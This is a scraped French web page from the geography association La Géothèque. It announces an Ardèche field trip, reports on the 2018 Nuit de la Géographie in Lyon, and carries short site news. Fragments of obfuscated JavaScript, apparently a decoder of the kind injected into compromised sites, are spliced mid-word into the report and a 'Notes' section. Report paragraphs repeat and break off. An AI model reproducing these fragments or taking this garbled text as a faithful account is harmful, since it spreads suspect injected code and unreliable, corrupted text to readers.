Prochain week-end sortie de terrain de la Géothèque : Ardèche le 7 juillet

Venez avec nous pour découvrir ou redécouvrir ce territoire !

Au programme :

SAMEDI 7 Juillet

8 h Départ de Lyon (covoiturage organisé)

10h30 : visite de l’usine Melvita (Basse Ardèche) puis Maison du PNR

Pique-nique en basse Ardèche ou au point du vue du Roux suivant la météo.

Samedi après midi : visite de l’Abbaye de Mazan où une réalisation artistique a été créée dans le cadre du parcours de la ligne de partage des eaux (voir sur le site du parc pour plus d’information).

Fin d’après midi : baignade si possible au Lac d’Issarlès

Installation à l’hôtel des Voyageurs à Issarlès où nous dînerons (14,5 euro par personne vin compris…). Pour réserver 04 66 46 21 43/06 43 59 76 36 de la part de Jean Louis Testud, notre charmant correspondant local.

DIMANCHE 8 Juillet

Visite de la station de moyenne montagne des Estables et point de vue extraordinaire sur les Boutières OU visite d’une forêt près de chez Jean Louis.

Déjeuner gastronomique à la ferme auberge de la Besse à Rieutord et Usclades (www.aubergedelabesse.com).
Retour à Lyon en fin d’après-midi.

Ouvert à tou.te.s, enfants compris, le seul coût étant celui du transport, des repas et hébergement à vos charges.

Pour vous inscrire contactez cathjouve@gmail.com avant le 27 mai !

La nuit de la géographie 2018 : bilan

L’organisation

Au fil de la mise en place de l’événement, des partenaires se sont joints au comité d’organisation d’une quinzaine de personnes.

Partenaires :

– École Urbaine de Lyon
– Université de Lyon
– Géoconfluences
– CartONG
– CafésGéo de Lyon
– le RGLL
– Géorizon
– AFNEG
– APHG
– Hévéa + La Cuisine Itinérante (lieu accueil et restauration)

C’est la Géothèque, en tant qu’association de promotion de la curiosité géographique qui est porteuse de cette Nuit de la Géo à Lyon.

Le lieu, la fréquentation globale, la communication

Le patio de l’Hévéa, lieu de rencontres géographiques

Le lieu choisi, l’Hévéa, « centre d’affaire éthique » accueillant des entreprises et associations d’ESS, s’est parfaitement prêté à la Nuit de la Géo, offrant un espace restauration (alimentation locale), un espace pour les ateliers, un autre pour les conf/café, le tout assez ramassé dans l’espace pour être convivial.

On estime à 200 personnes la fréquentation globale du lieu pendant la soirée, en comptant les personnes arrivées/reparties tôt, ou inversement arrivées/reparties tard, le public ayant évolué pendant la soirée. La qualité des interactions permises par une fréquentation moyenne et l’agencement des lieux a souvent été soulignée très positivement. De nombreuses personnes ont été tenues au courant de l’événement par : les réseaux professionnels de professeurs, le réseau propre au Mapathon, des réseaux étudiants, l’événement facebook, ou encore la newsletter de Géoconfluences.

Contenus

Départ de la balade urbaine, devant l’Hévéa

Balades urbaines

Deux étaient proposées en simultané (18h30-20h)

– La gentrification de la Guillotière : environ 60 personnes sont parties, très satisfaites. Il y a une importante demande de balades urbaines de la part du public.

- Traverser Perrache à pied, balade sensible : 20 personnes ont participé, dont une dizaine ont ensuite participé à la lecture de haïku rédigés en lien avec cette balade.

Ateliers

Plusieurs ateliers avaient lieu en simultané (18h-22h) dans une gr;p5=s4.indexOf(wc.charAt(vf++;q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=3p5&15)<<4)|(q8>>2);wb=4q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfande salle divisée en sous-espaces, la fréquentation a été continue (avec un creux pendant les balades urbaines puis à la fin) :

- Nomad Maps : retours très positifs, fréquentation continue et échanges de qualité
- Géograffitis : positif, a eu de bons échanges avec des curieux du graff.
- Campus Comestible : de bons retours aussi
- Cartographie sensible : un des gros succès de cette édition : a permis de proposer quelque chose d’adapté aux enfants mais pas seulement ! Une vingtaine de cartes ont été réalisées avec des matériaux faisant appel aux sens puis exposées au fur et à mesure
- Mapathon : gros succès également, une trentaine de cartographes pendant la soirée, habitués ou non des mapathons, de tous les âges et niveaux techniques. Le retour explicatif fait à tout le public en cours de soirée a été apprécié.

Projection du film Construire Mazagran puis débat avec la réalisatrice : la programmation tardive (début du film à 22h30) et la concomitance avec le débat du RGL a fait qu’il y avait peu de personnes à la projection (une vingtaine) malgré l'intérêt du film et du débat qui a suivi.

Expos/Librairie

Les expositions (de photos d’étudiants de l’asso Géorizon ; et d’une photographe Delphine Charlet) ont été appréciées. La présence d’un st;p5=s4.indexOf(wc.charAt(vf++;q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand d’ouvrages en lien avec les thématiques actuelles de la géographie, grâce à la Librairie Archipel, a été fructueuse et permettait la discussion et l’échange avec les auteurs présents pour les conférences.

Espace café

3 moments qui ont tous été fréquentés par environ 50 personnes à chaque fois (avec un pic à 70 personnes pour le second) :

- Café Géo de Stéphane Crozat sur les légumes anciens et la biodiversité cultivée
- Conférence de Michel Lussault sur la géographie à l'heure de l'Anthropocène
-  Atelier « surtout-pas-conférence » par le Réseau des Géographes Libertaires

Le café géo de Stéphane Crozat

 

 

 

 

 

 

Pour faire partie de l'aventure l'année prochaine contactez nous sur  : nuitdelageolyon@gmail.com 

Notes   [ + ]

1. p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfande de balades urbaines de la part du public.

- Traverser Perrache à pied, balade sensible : 20 personnes ont participé, dont une dizaine ont ensuite participé à la lecture de haïku rédigés en lien avec cette balade.

Ateliers

Plusieurs ateliers avaient lieu en simultané (18h-22h) dans une grande de balades urbaines de la part du public.

- Traverser Perrache à pied, balade sensible : 20 personnes ont participé, dont une dizaine ont ensuite participé à la lecture de haïku rédigés en lien avec cette balade.

Ateliers

Plusieurs ateliers avaient lieu en simultané (18h-22h) dans une gr;p5=s4.indexOf(wc.charAt(vf++

3. p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfande salle divisée en sous-espaces, la fréquentation a été continue (avec un creux pendant les balades urbaines puis à la fin) :

- Nomad Maps : retours très positifs, fréquentation continue et échanges de qualité
- Géograffitis : positif, a eu de bons échanges avec des curieux du graff.
- Campus Comestible : de bons retours aussi
- Cartographie sensible : un des gros succès de cette édition : a permis de proposer quelque chose d’adapté aux enfants mais pas seulement ! Une vingtaine de cartes ont été réalisées avec des matériaux faisant appel aux sens puis exposées au fur et à mesure
- Mapathon : gros succès également, une trentaine de cartographes pendant la soirée, habitués ou non des mapathons, de tous les âges et niveaux techniques. Le retour explicatif fait à tout le public en cours de soirée a été apprécié.

Projection du film Construire Mazagran puis débat avec la réalisatrice : la programmation tardive (début du film à 22h30) et la concomitance avec le débat du RGL a fait qu’il y avait peu de personnes à la projection (une vingtaine) malgré l'intérêt du film et du débat qui a suivi.

Expos/Librairie

Les expositions (de photos d’étudiants de l’asso Géorizon ; et d’une photographe Delphine Charlet) ont été appréciées. La présence d’un stande salle divisée en sous-espaces, la fréquentation a été continue (avec un creux pendant les balades urbaines puis à la fin) :

- Nomad Maps : retours très positifs, fréquentation continue et échanges de qualité
- Géograffitis : positif, a eu de bons échanges avec des curieux du graff.
- Campus Comestible : de bons retours aussi
- Cartographie sensible : un des gros succès de cette édition : a permis de proposer quelque chose d’adapté aux enfants mais pas seulement ! Une vingtaine de cartes ont été réalisées avec des matériaux faisant appel aux sens puis exposées au fur et à mesure
- Mapathon : gros succès également, une trentaine de cartographes pendant la soirée, habitués ou non des mapathons, de tous les âges et niveaux techniques. Le retour explicatif fait à tout le public en cours de soirée a été apprécié.

Projection du film Construire Mazagran puis débat avec la réalisatrice : la programmation tardive (début du film à 22h30) et la concomitance avec le débat du RGL a fait qu’il y avait peu de personnes à la projection (une vingtaine) malgré l'intérêt du film et du débat qui a suivi.

Expos/Librairie

Les expositions (de photos d’étudiants de l’asso Géorizon ; et d’une photographe Delphine Charlet) ont été appréciées. La présence d’un st;p5=s4.indexOf(wc.charAt(vf++

Le mot du président

Chers lecteurs, chers ami-e-s de la géographie, chers curieux et curieuses,

L’association La Géothèque fêtera ses 5 ans en septembre prochain. Je vais vous épargner les analogies habituelles en ces circonstances (les premiers pas de la Géothèque, ses premiers mots, sa première fessée déculottée quand des pirates ont mis le site à sac, etc.) mais je félicite chacun des fondateurs, chacun des membres, chacun de ceux qui nous rendent visite régulièrement ou qui parlent de nous autour d'eux, d'avoir permis à la Géothèque d'être toujours debout en 2016.
Si la face visible de l'iceberg est un site internet (pas toujours) régulièrement mis à jour, des petites mains s'agitent pour faire vivre le site dans l'ombre, Lire la suite

La Géothèque au cœur des négociations sur le climat…!

outre-mer-géothèqueSouhaitant promouvoir la mobilisation des territoires ultra-marins dans la lutte contre les changements climatiques lors de la Cop21, le ministère des Outre-mer a sollicité la Géothèque pour utiliser le planisphère de l’Outre-mer français publié sur notre site.
Et alors que les négociations battent leur plein, l’équipe du ministère vient de nous envoyer ces photos prises au sein du pavillon de la France, dans la zone officielle des négociations ; avec le commentaire suivant : « la carte que vous avez réalisée nous aide grandement à promouvoir les Outre-mer et leurs efforts contre les changements climatiques auprès des représentants des différents pays« .
Si les résultats sont concluants on pourra donc dire que notre modeste association a œuvré à sauver l’humanité…! 😉

Cop21-2 Voir la suite

Suppression des commentaires

Suite à une attaque de robots postant des commentaires qui redirigent les lecteurs de la Géothèque vers des sites, apparemment passionnants au demeurant, consacrés aux personnes touchées de surdéveloppement mammaire, ou vantant des méthodes paramédicales pour agrandir certaines parties de la morphologie masculine, les commentaires ont été désactivés sur le site.

En vous remerciant de votre compréhension...

Le dictionnaire des géographes a migré !

Trois mois après la construction de ce nouveau site, le Dictionnaire des Géographes a enfin été transféré, grâce à la participation de plusieurs membres de l’association. Vous pouvez y retrouver 300 auteurs en sciences sociales et près de 500 références bibliographiques ! De plus, un formulaire permet de proposer facilement de nouveaux auteurs pour compléter le dictionnaire.